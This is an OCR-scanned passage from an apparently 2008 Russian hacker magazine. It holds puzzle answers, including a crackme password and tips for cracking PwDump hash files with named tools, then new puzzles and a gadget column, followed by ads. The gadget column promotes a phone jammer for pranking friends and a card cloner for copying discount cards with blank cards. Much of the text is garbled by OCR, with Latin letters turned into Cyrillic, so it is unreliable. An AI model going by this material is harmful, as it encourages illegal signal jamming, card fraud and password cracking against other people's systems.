V ИВАН СКЛЯРОВ 

ПРОЙДИСЬ ДЕБАГГЕРОМ 
ПО СВОИМ МОЗГАМ! 



ХОРОШАЯ НОВОСТЬ: В ЭТОМ МЕСЯЦЕУ НАС МНОГО Х-ПРИЗОВ :). 



ПЕРВЫМ ТРЕМ ПОБЕДИТЕЛЯМ МЫ ВРУЧИМ ПО ЗАШИБЕННОМУ ИБП ОТ ІРРОИ: ВАСК СОМРО 



РКО 800, ВАСК ОРРІСЕ 600 ИЛИ ВАСК ѴЕК50, В ЗАВИСИМОСТИ ОТ ЗАНЯТОГО МЕСТА. 



А ЕСЛИ ТЫ ЗАЙМЕШЬ МЕСТО С 4 ПО 8, ТО ПОЛУЧИШЬ ПОДАРОЧНЫЙ МАЧО-НАБОР «АХЕ БУСТ». 





ЧИТАТЕЛИ, 
ЗАНЯВШИЕ 
МЕСТА С 4 ПО 9 

ППЛѴЧАТ ППЛ А- 



ОТВЕТЫ К ПРЕДЫДУЩЕМУ ВЫПУСКУ Х-РІІ22І.Е 



«КРЯКМИ» 

Верным логином является слово «сіоііз», а паролем «риззусаі». Исход- 
ный код файла ХРІІ22І_Е4.С0М прилагается на диске кжурналу. 



«ПЕРЕСТАНОВКИ СИМВОЛОВ» 

Если бы все символы пароля были одинаковыми, то задача свелась бы 
к простой задаче о перестановках, где общее число перестановокопре- 
деляется какп! (п факториал], т. е. 12! в случае двенадцатисимвольного 
пароля. Однако в заданном пароле присутствуетЗ одинаковых символа 
«А», 2 одинаковых символа «8» и 2 одинаковых символа « 2 », от переста- 
новки которых будут получаться одинаковые пароли. Следовательно, 
общее число паролей, которое можно составить из заданного пароля 
определяется как: 12!/(3!*2!*2!]=19958400. 

► 142 



«ВОССТАНОВИ ПАРОЛИ» 

На самом деле файл с хешами является примером РѵѵОитр-фай- 
ла из программы ЕСР( ). В этой же программе его 

можно и расшифровать — или в любой другой подобной программе, 
например ИОрЬЮгаск, ЗАМ I пэісіе ит. п. Что такое РѵѵОитр-файл и как 
пользоваться перечисленными программами, рекомендую узнать в 
моей книге «Хакерские фишки». 

«НАЙДИ ЗАКОНОМЕРНОСТЬ» 

Вместо красной точки должна стоять латинская буква «I» (ее АЗСІ 1-код 
73). Буквы в пароле расположены в порядке размещения их втабли- 
це АЗСІ I , но выбраны только такие коды, которые являются простыми 
числами, т. е. 67, 71 , 73, 79, 83, 89. Напомню, что простое число — это такое 
число, которое делится только на единицу и на само себя (без остатка]. 
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СЕТЕВОЙ ПАКЕТ 

Снифер перехватил сетевой пакет, Ьех-коды которого ты можешь видеть на рисунке. Опреде- 
ли МАС-адреса, сетевые порты и ІР-адреса отправителя и получателя этого пакета. 




0050 О0О1 000с 290? 0800 3500 . РѴ . .2. 

оого Гйсоо 0000 Эйов соа® соа® 

ѲеОі йвсе 000? 20Л2 <*Э47 0000 0000 5002 {..С Р. 

ЮОО 2са2 ООО С 



ШШШЖ 

Английской слово«ѴѴогсІ»с помощью некоторого 
алгоритма было закодировано следующим образом: 
«ОЬер». 

Раскодируй следующую фразу, закодированную с 
помощью этого же алгоритма: 

Оиѵб ѵб п ебоеѵр КСЬттуг 



Генератор случайных чисел выдал 
числа вдиапазонеот100до999, 
показанные на рисунке. 

Посмотри внимательно на эти 
числа и скажи, действительно ли они 
сгенерированы случайным образом. 
Если нет, то объясни, в чем законо- 
мерность. 



РАСПОЗНАЙ ДЕВАЙС 

На рисунках показаны различные компьютер- 
ные и сетевые девайсы, твоя задача правильно 
назвать их. 




ВАЖНЫЙ РНР-СКРИПТ 

РНР-скрипт, показанный на рисунке, содержит 
ошибку в безопасности. Определи, какую ошиб- 
ку содержит этот РНР-код и как ее исправить. 
Полностью этот РНР-код можно взять на диске 
к журналу. 

Подсказка: РНР-скриптобработан обфускато- 
ром изакриптован. 
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І 1 ИГЛУ ШНЛКН СОТОВЫХ ТЕЛЕФОНОВ 

я™ 

Конечно, в Новый год и без всяких глушилок позвонить куда-либо крайне 
сложно. Но в иной ситуации можно вдоволь поглумиться наддрузьями, 
если приобрести этот гаджет. Фокус простой. Одно движение руки - и все 
мобилки в радиусеЗ-5 метровтутже теряют сеть, причем во всех воз- 
можныхдиапазонах: 05М 800/900/1 800/1 900М62 и дажеЗО. Встроенного 
аккумулятора должно хватить на 3-4 часа глушения, ноты уж сжалься над 
товарищами: нетоми их столько. Надо сказать, производитель честно 
предупреждает, что в некоторых странах подобные приборы запрещены. 
Мы тебя тоже предупреждаем :). 



ІШЕПЛНЕЧННЯ ЭНЕРГИЯ 
ДЛЯТБПЕГПТЕПЕФПНН 

шт 

Солнечная батарейка для твоего сотового телефона - что скажешь? 
По-моему, чрезвычайно полезный гаджет. Теперь можно не париться, 
что где-нибудь в походе или другом городе утебя сядеттелефон. Все, что 
нужно солнечной зарядке, - это обычный свет. Причем, необязательно 
должно палить солнце: она работает даже в пасмурную погоду. В набор 
входят различные штекеры для телефонов, а также кабели для зарядки 
отобычной розетки и автомобильного прикуривателя. 



ЩПИШЕГП ППНЕТИК! 

Если ты до сих пор слабо представляешь, что хранится внутри пластико- 
вых банковских карточек или карт скидок, то этот девайс определенно 
для тебя! Совсем необязательно тратиться в магазине на бешеную сумму, 
чтобы получить заветную карточку - вместо этого ее можно клонировать! 
Правда, для этого понадобится купить “болванки” (продаются в пачках 
по 10 штук за 3 доллара] и придумать объяснение для продавца, почему 
твоя карта скидоксовершенно белая :). 



Ш КРНЕИБПЕТНБПП 

3 

По сути, довольно бесполезная фигня, которая с помощью вращающего 
механизма с небольшим ИСй-дисплеем отображаетзаданныйтекств 
воздухе. Но выглядиточеньэффектно. И более того: табло вполне можно 
приспособить для своих вполне конкретных нужд. Ведьтекстна него 
можно посылать динамически: начиная, отпросто времени и заканчивая 
котировками Соодіе. Все в твоих руках. 



ШПУНИБЕРЕНЛЬНЫЙ ПУЛЫ 
НН БРЕЛКЕ 



а.5Ч 



Уж сколько раз сталкивался с ситуацией, когда в баре или поезде пока- 
зывают какой-то странный канал, а музыка порой ореттак, что не знаешь, 
куда от нее деться. Раньше на этот случай у меня был КП К с инфракрас- 
ным портом, который легко воплощался в универсальный пульт при по- 
мощи специальной проги. Теперьже универсальный пультне превышает 
размеров брелка и его действительно можно повесить на ключ. 



Ш ПЕ ВЕРТОЛЕТ 

а 

Если приедешьв нашу редакции и мимотебя вдруг промчится радио- 
управляемый вертолет, знай: это играется наш Коля :). И ведь никакэто 
незакончится, потому что вертолет не ломается. Не в пример дорогим 
моделям, его можно и ронять, и об потолокударить- а ему все равно, ле- 
тает себе и все тут. Несмотря на свою смехотворную цену, эта прикольная 
игрушка действительно летает и вполне адекватноуправляется! 

Многие из подарков можно найти в Росси, но мы тебе рекомендуем 
затариваться в западных Интернет-магазинах. Например, на аукционе 

еВаѵ.сот, ѵуллпллсіеаіехігете.сот. ѵуллплліЬеіесЬдеек.сот. 

Выйдет гораздо дешевле. 
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Общайся иначе! Знакомься быстрее! 



фотокамера 

Сделай фото! 

Почта 

Читай и отправляй! 

Скидки и бонусы 

Подарки, распродажи, акции 

Знакомства 

На любой вкус и цвет 



Мульти-портал Ѵарр! ш имеет мобильную аську, благодаря которой 
вы можете отправлять короткие сообщения в 300 раз дешевле смс! 

Легкая установка. 

Общение на ходу. 

Знакомства в любом месте. 

Мобильное фото. 

Более 20 разных сервисов. 



р 


Мобильная аська 

| Будь на связи 




— г — 


о 


Блоги 

Веди дневник 


@ 






Г 


а 


Платежи 

Платежи за мобильник и пр. 


о 








[р|| 


ТВ-программа 

Узнай, что смотреть! 


т 



фотогалереи 

Размести фото! 



Уарр! СооР$ 

Книги, музыка, видео 



Прогноз погоды 

Более 4000 городов 



Р 



форум 

выскажись! 



Анекдоты 

Ржунимагу! 



Игры 

Померься с друзьями! 













М1530 

Превосходный дизайн, уникальное сочетание мощности и 
функциональности. На базе процессора Іпіеі® Соге™ 2 Оію. 



Элегантный дизайн, 

непревзойденная 

производительность 




Легкость и удобство управления всеми 
мультимедийными функциями благодаря 
прилагаемому пульту дистанционного 
управления и высококачественным наушникам. 

Фантастическая яркость с уникальным 
дисплеем ѴѴЬЕО. Он ярче, легче и тоньше 
стандартного дисплея портативных 
компьютеров. 



Новый ХР$ М1530 - максимальные мультимедийные 
возможности, легкость подключения и великолепный выбор 
для развлечений. Уникальное предложение ноутбука с 
матрицей 15,4 дюйма. Самые современные компоненты - от 
отдельного графического процессора до дополнительного 
оптического дисковода ВІи-гау. Необыкновенный корпус, 
изготовленный из высококачественных материалов. 




Красный или черный? 
Твой выбор. 



ОШ 



ѴОІІВЗ 18 НЕВЕ 

реклама 



тел.: (495)981-84-84 

ѵшѵѵ.тегііоп.ги - широкопрофильная дистрибуция 
ѵѵѵш.тег$у$$.ги - проектная дистрибуция 
шш.сііііпк.ги, тел.: (495) 780-20-02 

ОеІІ, логотип ОеІІ и ХРЗ™ являются товарными знаками корпорации ОеІІ. Іпіеі® , логотип Іпіеі, Іпіеі Соге™ и Соге™ являются товарными знаками корпорации ІпіеІ в США и других странах. 

Другие товарные знаки и фирменные названия могут использоваться в настоящем документе для обозначения организаций, владеющих соответствующими знаками, или названий их продукции. Корпорация ОеІІ не претендует на права собственности в отношении 
знаков и названий, принадлежащих другим владельцам. © Корпорация ОеІІ, 2008 г. Все права защищены. Воспроизведение или распространение любым способом без явно выраженного письменного разрешения корпорации ОеІІ строго запрещено. 
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Реклама. © ІЧокіа, 2008. 
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I МАЖА СОМЕ 
ІЛТІМАТЕ 
ВІС 501ІШ 
ТОІІСНМЕ 
РИОИЕ 
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ЛИНДСЕЙ ЛОХАН 



ТНЕ М'5 




ТНЕ І51ЕУ ВКОТНЕК5 
В1122СОСК5 



ІМОКІА 

Соппейіпд Реоріе 



МУЗЫКА ЖДЕТ 
НАШИХ ПРИКОСНОВЕНИЙ 

• мгновенный доступ к музыке 

• чистый стереозвук, мощные встроенные динамики 

• до 35 часов работы в режиме прослушивания 

• карта памяти тісгоБР объемом 8 Гбайт в комплекте 

• разъем 3,5 мм 



